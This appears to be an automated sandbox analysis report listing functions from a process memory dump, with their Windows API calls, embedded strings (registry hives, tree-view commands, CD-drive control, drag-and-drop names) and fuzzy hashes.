String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5e00bcee4891d16228c162d81f1b54f7a46210c568dbd13ad9f78ec4eb3ea37c
Instruction ID: cba8dd3c170b9c017d8b11285108e0f87e16a046a3023fcdb29f8cd8f182a629
Opcode Fuzzy Hash: 5e00bcee4891d16228c162d81f1b54f7a46210c568dbd13ad9f78ec4eb3ea37c
Instruction Fuzzy Hash: 1B1259356042019FCB14DF15D881F2AB7E6EF88714F14885DF98AAB3A2CB31ED45CBA1

Function 00E513BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00E51462
_wcslen.LIBCMT ref: 00E5149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E514F0
_wcslen.LIBCMT ref: 00E51526
_wcslen.LIBCMT ref: 00E515A2
_wcslen.LIBCMT ref: 00E5161D

Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D

Part of subcall function 00E23535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E23547

Strings

EXISTS, xrefs: 00E51618, 00E51633
COLLAPSE, xrefs: 00E5159D, 00E515B8
UNCHECK, xrefs: 00E517DA
CHECK, xrefs: 00E51521, 00E5153C
ISCHECKED, xrefs: 00E5177D
GETTEXT, xrefs: 00E51733
GETSELECTED, xrefs: 00E516EA
GETITEMCOUNT, xrefs: 00E516BA
SELECT, xrefs: 00E517AD
EXPAND, xrefs: 00E51694
GETTOTALCOUNT, xrefs: 00E5148E, 00E514B3

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: b990ed808cefade8e0ff02a26d82e19a5571749983d5314af12f448e2fb32bdf
Instruction ID: f8fd7992e9436f2b78dd463208c74cc4eb41e3847333a8cacd0cb98925d28228
Opcode Fuzzy Hash: b990ed808cefade8e0ff02a26d82e19a5571749983d5314af12f448e2fb32bdf
Instruction Fuzzy Hash: F4E1D0356083018FCB14EF24C450A6AB7E2FF94314B14599DFC96AB3A1DB30ED49CBA1

Function 00E4D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
_wcslen.LIBCMT ref: 00E4D451
_wcslen.LIBCMT ref: 00E4D4C8
_wcslen.LIBCMT ref: 00E4D4FE
_wcslen.LIBCMT ref: 00E4D559
_wcslen.LIBCMT ref: 00E4D58F
_wcslen.LIBCMT ref: 00E4D5DF

Strings

HKU, xrefs: 00E4D650
HKEY_CURRENT_USER, xrefs: 00E4D61D
HKEY_CURRENT_CONFIG, xrefs: 00E4D5D9, 00E4D5DE
HKCU, xrefs: 00E4D62E
HKEY_CLASSES_ROOT, xrefs: 00E4D553, 00E4D558
HKCR, xrefs: 00E4D589, 00E4D58E
HKLM, xrefs: 00E4D4F8, 00E4D4FD
HKEY_USERS, xrefs: 00E4D63F
HKCC, xrefs: 00E4D60C
HKEY_LOCAL_MACHINE, xrefs: 00E4D4C2, 00E4D4C7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 527bf2ce9f22c49fb5ecbae333a7c75457abbbe5aea572e3704edcba3f032e21
Instruction ID: e81377ac97b122713dc38c95e225e3d49d3839f63718ecdcce245c894c05710f
Opcode Fuzzy Hash: 527bf2ce9f22c49fb5ecbae333a7c75457abbbe5aea572e3704edcba3f032e21
Instruction Fuzzy Hash: C9711A326081168BCB10AF7CED015FF33A1AB6075CB612129FC2AB7294EE35DD458770

Function 00E58D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E58DB5
_wcslen.LIBCMT ref: 00E58DC9
_wcslen.LIBCMT ref: 00E58DEC
_wcslen.LIBCMT ref: 00E58E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E58E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E56691), ref: 00E58EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E58EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E58F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E58F5C
FreeLibrary.KERNEL32(?), ref: 00E58F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E58F78
DestroyIcon.USER32(?,?,?,?,?,00E56691), ref: 00E58F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E58FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E58FB0

Strings

.icl, xrefs: 00E58DC3
.exe, xrefs: 00E58DE3
.dll, xrefs: 00E58E06

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: b0913cfeee10a3f7827938ac93f6042ed95bb1af573be67d3206cbfe2d5ac50e
Instruction ID: ee73a5073854792ad8c929921a8410d896dec835a01aedb1f6ffa13110cbf416
Opcode Fuzzy Hash: b0913cfeee10a3f7827938ac93f6042ed95bb1af573be67d3206cbfe2d5ac50e
Instruction Fuzzy Hash: 7861DF71A00219BEEB289F65CD42BBE77A8EB08B16F104906FD15F60D1DF749958CBB0

Function 00E348BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E3493D
_wcslen.LIBCMT ref: 00E34948
_wcslen.LIBCMT ref: 00E3499F
_wcslen.LIBCMT ref: 00E349DD
GetDriveTypeW.KERNEL32(?), ref: 00E34A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34ACC

Strings

close cd wait, xrefs: 00E34AB7
set cd door , xrefs: 00E34A6D
closed, xrefs: 00E3494D, 00E34972, 00E3498B, 00E349C3, 00E349DC
open, xrefs: 00E34999, 00E3499E
open , xrefs: 00E34A2A
close, xrefs: 00E34943, 00E3495D
type cdaudio alias cd wait, xrefs: 00E34A46
wait, xrefs: 00E34A89

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 48d954b23ad6a6bd9cef2342f2d71a5783062aeac944e340eb014d437df2f646
Instruction ID: e3fd5a81ca5c52af695c0d0553006d01df777afa67e10e51931683eb991d20bf
Opcode Fuzzy Hash: 48d954b23ad6a6bd9cef2342f2d71a5783062aeac944e340eb014d437df2f646
Instruction Fuzzy Hash: DA71E9B25083029FC710EF34C841A6BBBE4EF98758F10592DF49AA7291EB31ED45CB61

Function 00E26382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00E26395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E263A7
SetWindowTextW.USER32(?,?), ref: 00E263BE
GetDlgItem.USER32(?,000003EA), ref: 00E263D3
SetWindowTextW.USER32(00000000,?), ref: 00E263D9
GetDlgItem.USER32(?,000003E9), ref: 00E263E9
SetWindowTextW.USER32(00000000,?), ref: 00E263EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E26410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E2642A
GetWindowRect.USER32(?,?), ref: 00E26433
_wcslen.LIBCMT ref: 00E2649A
SetWindowTextW.USER32(?,?), ref: 00E264D6
GetDesktopWindow.USER32 ref: 00E264DC
GetWindowRect.USER32(00000000), ref: 00E264E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E2653A
GetClientRect.USER32(?,?), ref: 00E26547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00E2656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E26596

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: e145b26e8ca5ecfa573230c9d21bc3c484f273c26b56e45e69dccb514e95bd8b
Instruction ID: 4f5612ab08a40af143d9b3406bb2154193d3217c78014006de5a4990bd24b1a4
Opcode Fuzzy Hash: e145b26e8ca5ecfa573230c9d21bc3c484f273c26b56e45e69dccb514e95bd8b
Instruction Fuzzy Hash: FE71CC31900719AFDB20DFA9DE85AAEBBF5FF48709F100A18E196B25A0C770E944CB50

Function 00E4086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00E40884
LoadCursorW.USER32(00000000,00007F8A), ref: 00E4088F
LoadCursorW.USER32(00000000,00007F00), ref: 00E4089A
LoadCursorW.USER32(00000000,00007F03), ref: 00E408A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00E408B0
LoadCursorW.USER32(00000000,00007F01), ref: 00E408BB
LoadCursorW.USER32(00000000,00007F81), ref: 00E408C6
LoadCursorW.USER32(00000000,00007F88), ref: 00E408D1
LoadCursorW.USER32(00000000,00007F80), ref: 00E408DC
LoadCursorW.USER32(00000000,00007F86), ref: 00E408E7
LoadCursorW.USER32(00000000,00007F83), ref: 00E408F2
LoadCursorW.USER32(00000000,00007F85), ref: 00E408FD
LoadCursorW.USER32(00000000,00007F82), ref: 00E40908
LoadCursorW.USER32(00000000,00007F84), ref: 00E40913
LoadCursorW.USER32(00000000,00007F04), ref: 00E4091E
LoadCursorW.USER32(00000000,00007F02), ref: 00E40929
GetCursorInfo.USER32(?), ref: 00E40939
GetLastError.KERNEL32 ref: 00E4097B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: bc42e2506c646cab991d3415205e1cf4837f200ec66380c427ac5fe9be6183d6
Instruction ID: 6d22421722c8d968421245beaa7b7be25d3c2a33af8d7f62ec7cd50aa2afc009
Opcode Fuzzy Hash: bc42e2506c646cab991d3415205e1cf4837f200ec66380c427ac5fe9be6183d6
Instruction Fuzzy Hash: 184151B0D483196ADB109FBA9C89C6EBFA8FF44754B50452AA15CE7281DB78D801CFA1

Function 00E23A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E23AD9
_wcslen.LIBCMT ref: 00E23B44

Strings

REGEXPCLASS, xrefs: 00E23BA1, 00E23BB2
NAME, xrefs: 00E23C81, 00E23C92
TEXT, xrefs: 00E23DC8
k, xrefs: 00E23CE6
CLASS, xrefs: 00E23AD4, 00E23AF1
CLASSNN, xrefs: 00E23B3F, 00E23B50
INSTANCE, xrefs: 00E23D9F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
API String ID: 176396367-2171760788
Opcode ID: 8b8b47cc91d502202bf73f055343ef1f0b9446b76d96884b29047e90f4b1c65c
Instruction ID: 0afd4dc5b27afe4fe56f6198f5b5aa7d6aa26ec8ed30194ffcd545619ddb154f
Opcode Fuzzy Hash: 8b8b47cc91d502202bf73f055343ef1f0b9446b76d96884b29047e90f4b1c65c
Instruction Fuzzy Hash: F8E10532A006269BCB14AF74D8427EDFBB1FF54714F14512AE45AF7250DB34AE898FA0

Function 00E59B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

DragQueryPoint.SHELL32(?,?), ref: 00E59BA3

Part of subcall function 00E580AE: ClientToScreen.USER32(?,?), ref: 00E580D4
Part of subcall function 00E580AE: GetWindowRect.USER32(?,?), ref: 00E5814A
Part of subcall function 00E580AE: PtInRect.USER32(?,?,?), ref: 00E5815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00E59C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E59C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E59C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E59C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00E59C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00E59CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00E59CD3
DragFinish.SHELL32(?), ref: 00E59CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00E59DCD

Strings

(, xrefs: 00E59DAB
@GUI_DRAGFILE, xrefs: 00E59D7C
(, xrefs: 00E59B8C
@GUI_DRAGID, xrefs: 00E59D45
@GUI_DROPID, xrefs: 00E59CFA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
API String ID: 221274066-1080139498
Opcode ID: c23b26a1b866fa09aab8271a31fa84a0b250917d3ea47168856ff86ea2662856
Instruction ID: 850ead03f685b5f1b7e24e56df81899a7c39857742e795263c6956d9ce8c4af4
Opcode Fuzzy Hash: c23b26a1b866fa09aab8271a31fa84a0b250917d3ea47168856ff86ea2662856
Instruction Fuzzy Hash: 0C616A71108301AFC715EF61CC85E9FBBE8EF88751F40091EF695A31A1DB309A49CB62

Function 00DE0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DE0436

Part of subcall function 00DE045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9170C,00000FA0,B4417AB3,?,?,?,?,00E02733,000000FF), ref: 00DE048C
Part of subcall function 00DE045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E02733,000000FF), ref: 00DE0497
Part of subcall function 00DE045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E02733,000000FF), ref: 00DE04A8
Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DE04BE
Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DE04CC
Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DE04DA
Part of subcall function 00DE045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DE0505
Part of subcall function 00DE045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DE0510

___scrt_fastfail.LIBCMT ref: 00DE0457

Part of subcall function 00DE0413: __onexit.LIBCMT ref: 00DE0419

Strings

SleepConditionVariableCS, xrefs: 00DE04C4
InitializeConditionVariable, xrefs: 00DE04B8
WakeAllConditionVariable, xrefs: 00DE04D2
kernel32.dll, xrefs: 00DE04A3
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DE0492

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 1e31697397f294f9708684b68c464d054baa15aa586812ea628598a698a8f948
Instruction ID: 106fa0284430c80331ff2bee4837bdb27dea6c30c0321ccbca34442c496664e8
Opcode Fuzzy Hash: 1e31697397f294f9708684b68c464d054baa15aa586812ea628598a698a8f948
Instruction Fuzzy Hash: 8D212C326457556FD7243BA6AD05B6A3B94DB05BA2F040516F901B72C0DBF08884CA71

Function 00E34F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00E5DCD0), ref: 00E34F6C
_wcslen.LIBCMT ref: 00E34F80
_wcslen.LIBCMT ref: 00E34FDE
_wcslen.LIBCMT ref: 00E35039
_wcslen.LIBCMT ref: 00E35084
_wcslen.LIBCMT ref: 00E350EC

Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D

GetDriveTypeW.KERNEL32(?,00E87C10,00000061), ref: 00E35188

Strings

network, xrefs: 00E350E2, 00E350E7
unknown, xrefs: 00E3514D
removable, xrefs: 00E3502F, 00E35034
fixed, xrefs: 00E3507A, 00E3507F
all, xrefs: 00E34F76, 00E34F7B
cdrom, xrefs: 00E34FD4, 00E34FD9
ramdisk, xrefs: 00E35136

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 14d9c45c9eef71bc935030df799aaf8ffcc6a1a3f32b128caef7d2f67b7a4963
Instruction ID: e7640f26ba381009aed58d4e60e91dbbd756cff9f6b94a53f67c7b6087b1d053
Opcode Fuzzy Hash: 14d9c45c9eef71bc935030df799aaf8ffcc6a1a3f32b128caef7d2f67b7a4963
Instruction Fuzzy Hash: B7B103326087029FC714EF28C895A6BBBE6FF94724F10591DF496A7391D731D844CBA2

Function 00E4BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E4BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC34
_wcslen.LIBCMT ref: 00E4BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC96
_wcslen.LIBCMT ref: 00E4BD92

Part of subcall function 00E30F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E30F6D

_wcslen.LIBCMT ref: 00E4BDAB
_wcslen.LIBCMT ref: 00E4BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4BE16
GetLastError.KERNEL32(00000000), ref: 00E4BE67
CloseHandle.KERNEL32(?), ref: 00E4BE99
CloseHandle.KERNEL32(00000000), ref: 00E4BEAA
CloseHandle.KERNEL32(00000000), ref: 00E4BEBC
CloseHandle.KERNEL32(00000000), ref: 00E4BECE
CloseHandle.KERNEL32(?), ref: 00E4BF43

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 8ded31ff8f2ac253309f46946dce1a8d89e1d8aaf1109235daf6230ef12e6b30
Instruction ID: 43769d59854076358e33295fdb93166e4ff018869eb49aecf9be14df4cdf182d
Opcode Fuzzy Hash: 8ded31ff8f2ac253309f46946dce1a8d89e1d8aaf1109235daf6230ef12e6b30
Instruction Fuzzy Hash: C5F1E0316043419FC714EF24D891B6ABBE5FF84314F18995DF889AB2A2CB31EC45CB62

Function 00E44A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E5DCD0), ref: 00E44B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E44B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00E5DCD0), ref: 00E44B4F
FreeLibrary.KERNEL32(00000000,?,00E5DCD0), ref: 00E44B9B
StringFromGUID2.OLE32(?,?,00000028,?,00E5DCD0), ref: 00E44C05
SysFreeString.OLEAUT32(00000009), ref: 00E44CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E44D25
SysFreeString.OLEAUT32(?), ref: 00E44D4F

Strings

GetModuleHandleExW, xrefs: 00E44B24
kernel32.dll, xrefs: 00E44B13

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
